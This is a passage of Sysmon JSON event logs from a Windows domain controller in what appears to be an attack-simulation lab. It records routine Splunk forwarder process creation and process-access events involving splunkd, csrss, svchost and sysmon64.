0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:02:00.529","ProcessGuid":"{E2A3D6B1-1368-5F25-0000-0010748E0E00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","FileVersion":"8.0.2","Description":"Registry monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-regmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8313,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:00.529\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001061AF0C00}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:00.529","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001061AF0C00}","TargetProcessId":"4852","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8314,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:00.529\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133B-5F25-0000-001061AF0C00}\r\nTargetProcessId: 4852\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:00.529","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133B-5F25-0000-001061AF0C00}","TargetProcessId":"4852","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8315,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:00.529\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:00.529","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8316,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:00.529\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:00.529","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8317,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:00.529\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:00.529","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8318,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:00.529\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:00.529","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8319,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:00.529\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:00.529","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:01","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8320,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:00.529\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 